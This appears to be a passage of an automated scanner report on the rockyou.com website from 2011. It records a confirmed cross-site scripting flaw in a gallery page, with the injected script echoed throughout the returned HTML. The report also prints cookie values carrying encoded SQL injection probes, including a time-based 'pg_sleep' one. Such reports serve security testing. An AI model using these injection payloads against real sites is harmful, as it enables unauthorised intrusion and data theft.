<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="--><script>netsparker(9)</script>"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="3"><br /><input type="hidden" name="user" id="user" value="--><script>netsparker(9)</script>"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><..
|
- /show_my_gallery2.php
/show_my_gallery2.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| instanceid | GET | '+alert(9)+' |
| fb | GET | 1 |
Request
GET /show_my_gallery2.php?instanceid='%2Bnetsparker(9)%2B'&fb=1 HTTP/1.1
Referer: http://www.rockyou.com/show_my_gallery.php?instanceid=13193054&fb=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166023; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/show_my_gallery.php?instanceid=13193054&fb=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166023; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:33:43 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:33:42 GMT; path=/; domain=.rockyou.com,lastlogin=1303166023; expires=Wed, 27-Jul-2011 22:33:43 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:33:43 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:33:43 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:33:43 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=262697 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9844
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="js/lightbox/prototype.js" type="text/javascript"></script><script src="js/lightbox/scriptaculous.js?load=effects" type="text/javascript"></script><script src="js/lightbox/lightbox.js" type="text/javascript"></script><script src="js/embeds.js?ver=5" type="text/javascript"></script><script src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js" type="text/javascript"></script><script src="js/subscription.js?ver=2" type="text/javascript"></script><script src="/js/standard.js" type="text/javascript"></script><link href="/css/style.css" rel="stylesheet" type="text/css"><link href="/css/comment.css" rel="stylesheet" type="text/css"><link href="/css/profile.css" rel="stylesheet" type="text/css"><link href="/css/lightbox.css" rel="stylesheet" type="text/css"><link href="/css/star_rating.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> <meta name="title" content="RockYou Slideshow" />
<meta name="description" content="Check out my new photos from RockYou.com." />
<link rel="image_src" href="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" />
<link rel="video_src" href="http://apps.rockyou.com/rockyou.swf?instanceid='+netsparker(9)+'"/>
<meta name="video_height" content="320" />
<meta name="video_width" content="426" />
<meta name="video_type" content="application/x-shockwave-flash" /></HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-button" style="font-weight:bold"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-create&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fchoose_widget.php">CREATE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-browse&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Ffeaturedartists.php">BROWSE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-mystuff&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fmy_stuff.php">MY STUFF</a></div> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-login&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Log In</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-register&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Register</a> | <a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png");'> <img src="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" class="transparent"/> </div> </div> </div> <br>
<script type="text/javascript">
function thickBoxFrame(msg, url){
//alert(url);
url = url+'?KeepThis=true&TB_iframe=true&height=310&width=370';
TB_show('fff', 'http://www.google.com', '');
}
function getImgLink(img_src, img_cap) { var first_dot_index = img_src.indexOf('.') + 1; var rest_url = img_src.slice(first_dot_index,img_src.length); var second_dot_index = rest_url.indexOf('.'); var second_slice_index = rest_url.indexOf('/')+ first_dot_index ; var partner_name = rest_url.slice(0,second_dot_index); var partner_url = img_src; partner_url = img_src.slice(0,second_slice_index); //alert( '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\">rest_url</a>'); if (partner_name == 'badongo'){ img_src= img_src.replace('/ry/','/pic/').replace('.jpg',''); return '<a href=\"'+img_src+'\" target="_blank" title=\"'+img_cap+'\">view pic<br>('+partner_name+')</a>'; }else{ return '<a href=\"'+img_src+'\" rel=\"lightbox[show]\" title=\"'+img_cap+'\" onclick=\"ajax_post_john(\'/events/include/ajaxtrackevent.php\',\'name=rockyou-mobile&value=showmygallery\',null,null);\">view pic<br>('+partner_name+')</a>'; } }
function deleteComment(url) {
deleteme = confirm("Delete This Comment?");
if (deleteme) {
window.location=url;
}
}
function deletethis (e) {
if (!e) var e = window.event;
var tg = (e.target) ? e.target : e.srcElement
removeObj(tg.parentNode);
}
function removeObj(tr){
tr.parentNode.removeChild(tr);
}
function addtxtbox()
{
table=document.getElementById('tbltext');
mycurrent_row=document.createElement("TR");
mycurrent_cell=document.createElement("TD");
try
{
mycurrent_cell.innerHTML="<input type=\"text\" name=\"to[]\" class=\"textboxcl2\"> <input type=\"button\" value=\"Remove\" onclick=\"deletethis(event)\">";
}
catch(e)
{
mytextbox=document.createElement("INPUT");
mytextbox.setAttribute("type","text");
mytextbox.setAttribute("name","to[]");
mytextbox.setAttribute("class","textboxcl2");
mycurrent_cell.appendChild(mytextbox);
mybutton=document.createElement("INPUT");
mybutton.setAttribute("type","Button");
mybutton.setAttribute("value","Remove");
mybutton.setAttribute("onclick","alert('this')");
mycurrent_cell.appendChild(mybutton);
}
mycurrent_row.appendChild(mycurrent_cell);
table.getElementsByTagName('tbody')[0].appendChild(mycurrent_row);
}
function xmlhttpPostURL(type,data,url) {
var xmlHttpReq = false;
var self = this;
// Mozilla/Safari
if (window.XMLHttpRequest) {
self.xmlHttpReq = new XMLHttpRequest();
}
// IE
else if (window.ActiveXObject) {
self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP");
}
self.xmlHttpReq.open('POST', url+"?instanceid=&#039;+netsparker(9)+&#039;", true);
self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8");
self.xmlHttpReq.onreadystatechange = function() {
if (self.xmlHttpReq.readyState == 4) {
//alert(self.xmlHttpReq.responseXML);
notXML = false;
if (self.xmlHttpReq.responseXML)
{
//eval ("var resp = "+self.xmlHttpReq.responseText);
xmlDoc = self.xmlHttpReq.responseXML.documentElement;
if (xmlDoc)
{
var thumbClass = (navigator.appVersion.indexOf('MSIE 6') == -1) ? 'smallthumb' : 'smallthumbIE6';
imageList = xmlDoc.getElementsByTagName("image");
capList = xmlDoc.getElementsByTagName("text");
imgs = "";
if (thumbnailStart > imageList.length) thumbnailStart -= calcThumbnailsCount();
if (thumbnailStart < 0) thumbnailStart = 0;
thumbnailEnd = thumbnailStart + calcThumbnailsCount();
if (thumbnailEnd > imageList.length) thumbnailEnd = imageList.length;
for (i = 0; i < imageList.length; i++)
{
img_src = imageList[i].getAttribute("path");
img_cap = URLDecode(capList[i].getAttribute("text"));
img_link = getImgLink(img_src, img_cap);
if ((i >= thumbnailStart) && (i < thumbnailEnd)) {
imgs += "<div class='thumbwrap'>";
} else {
imgs += "<div class='thumbwrap' style='display:none'>";
}
imgs += "<a href='"+img_src+"' rel='lightbox[show]'><img src='"+img_src+"' class='"+thumbClass+"' title=\""+img_cap+"\"></a><br><img src='/images/icons/mobilephone.gif' style='margin-top:8px;margin-left:7px;cursor:pointer;float:left' onclick=\"ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-mobile&value=showmygallery',null,null); window.open('http://photofun.funmo.com/rockyou/photos/new?orig_url="+escape(img_src)+"','tomobile','width=776,height=585,status=no,toolbar=no,menubar=no,scrollbars=no,resizable=yes,location=no,directories=no,status=no');return false;\">";
imgs += img_link+"</div>";
}
document.getElementById("photothumbs").innerHTML = imgs;
initLightbox();
actionJump();
}
else
{
notXML = true;
}
}
else
{
notXML = true;
}
if (notXML)
{
eval ("var resp = "+self.xmlHttpReq.responseText);
if (resp['mode']=='vote')
{
//set new Rating and Votes
document.getElementById('current-rating').style.width=30*resp['data'][0];
document.getElementById('current-vote').innerHTML=resp['data'][1]+' Votes';
}
}
}
}
self.xmlHttpReq.send(type+"="+escape(data));
}
function URLDecode(psEncodeString)
{
var lsRegExp = /\+/g;
return unescape(String(psEncodeString).replace(lsRegExp, " "));
}
function setStartSlide(slide)
{
document.getElementById('flashsrc').innerHTML='<embed src="http://apps.rockyou.com/rockyou.swf?instanceid=&#039;+netsparker(9)+&#039;&startSlide='+slide+'" quality="high" wmode="transparent" width="426" height="320" flashvars="appWidth=325&appHeight=244" name="slideshowpreview" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"/>';
}
function initPage()
{
xmlhttpPostURL("1",'',"xmlproxy.php");
}
if (window.addEventListener) {
window.addEventListener('load',initPage,false);
}
else window.attachEvent('onload',initPage);
function actionJump()
{
}
function rate_vote(vote)
{
xmlhttpPostURL("vote",vote,"show_my_gallery-ajax.php");
//alert(vote);
}
function rate_display(vote)
{
var note = "";
switch (vote)
{
case 1:
note = "Total Junk";
break;
case 2:
note = "Kinda Lame";
break;
case 3:
note = "Its OK";
break;
case 4:
note = "Pretty Good";
break;
case 5:
note = "Way Hot";
break;
}
document.getElementById('ratingtitle').innerHTML=note;
}
function rate_displayout()
{
document.getElementById('ratingtitle').innerHTML = "Rate Me!";
}
</script>
<div id="container" style='width:1125px;margin:auto;padding-top:15px'>
<div style="float:left;width:800px">
<table id="photothumbscontainer" style="margin-bottom:15px;" cellpadding="0" cellspacing="0" ><tr>
<td><img src="/images/thumbnailsLeft.gif" onclick="thumbnailStart-=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
<td id="photothumbs" style="width:800px; height:94px; background:#300018; padding: 2px 0; font-size:10px; vertical-align:bottom"> </td>
<td><img src="/images/thumbnailsRight.gif" onclick="thumbnailStart+=calcThumbnailsCount();updateThumbnails()" style="cursor:pointer" /></td>
</tr></table>
<div id="contentwrapper" style="float:left" >
<div id="contentcolumn" style="width:500px" align="center">
<div align="left" style="width:500px">
<div style="width:425px;margin:0 auto;border:2px solid red;background:red;text-align:center;color:white">PRIVATE SLIDESHOW</div> <div id="slideshow-container" style="width:450px; height:300px; margin:0px auto 20px; border: 1px solid #a80050">
<div id='flashsrc'>
<table cellpadding="0" cellspacing="0" border="0">
<tr valign="top">
<td><div id="embeddiv"></div></td>
<td>
<div style="width:100px;height:100px;position:absolute;">
<!--script type="text/javascript">var likeParams = ['01078cba91618ea1','drawerbutton'];</script><script type="text/javascript" src="http://partner.like.com/likesense/rockyou.js"></script-->
</div>
</td>
</tr>
</table>
</div>
</div>
<style>
#photothumbs a:link {color:#ffffff;}
</style>
<table style="margin: 0 auto; clear:both" width="450px"><tr>
<script>
function showPagelet(p) {
document.getElementById('sharePagelet').style.display='none';
document.getElementById('ratePagelet').style.display='none';
document.getElementById(p).style.display='';
}
</script>
<td><a href="#" onclick="ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-share&value=showmygallery',null,null); showPagelet('sharePagelet'); return false;">SHARE</a></td>
<td><a href="#" onclick="showPagelet('ratePagelet'); return false;">RATE</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-makeaslideshow&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fviewpage_clickthrough.php%3Fwidget%3Dslideshow%26instanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">MAKE A SLIDESHOW</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-addtofavorites&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Faddfavorite.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">ADD TO FAVORITES</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-report&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fsetinappropriate.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">REPORT</a></td>
</tr></table>
<div id="..
Date: Mon, 18 Apr 2011 22:33:43 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:33:42 GMT; path=/; domain=.rockyou.com,lastlogin=1303166023; expires=Wed, 27-Jul-2011 22:33:43 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:33:43 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:33:43 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:33:43 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=262697 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9844
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="js/lightbox/prototype.js" type="text/javascript"></script><script src="js/lightbox/scriptaculous.js?load=effects" type="text/javascript"></script><script src="js/lightbox/lightbox.js" type="text/javascript"></script><script src="js/embeds.js?ver=5" type="text/javascript"></script><script src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js" type="text/javascript"></script><script src="js/subscription.js?ver=2" type="text/javascript"></script><script src="/js/standard.js" type="text/javascript"></script><link href="/css/style.css" rel="stylesheet" type="text/css"><link href="/css/comment.css" rel="stylesheet" type="text/css"><link href="/css/profile.css" rel="stylesheet" type="text/css"><link href="/css/lightbox.css" rel="stylesheet" type="text/css"><link href="/css/star_rating.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> <meta name="title" content="RockYou Slideshow" />
<meta name="description" content="Check out my new photos from RockYou.com." />
<link rel="image_src" href="http://cdn.rockyou.com/rockyou.com/bling3/ry_logo28.png" />
<link rel="video_src" href="http://apps.rockyou.com/rockyou.swf?instanceid='+netsparker(9)+'"/>
<meta name="video_height" content="320" />
<meta name="video_width" content="426" />
<meta name="video_type" content="application/x-shockwave-flash" /></HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-button" style="font-weight:bold"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-create&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fchoose_widget.php">CREATE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-browse&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Ffeaturedartists.php">BROWSE</a></div> <div class="nav-button"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-mystuff&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fmy_stuff.php">MY STUFF</a></div> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-login&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Flogin%2Findex.php">Log In</a> | <a 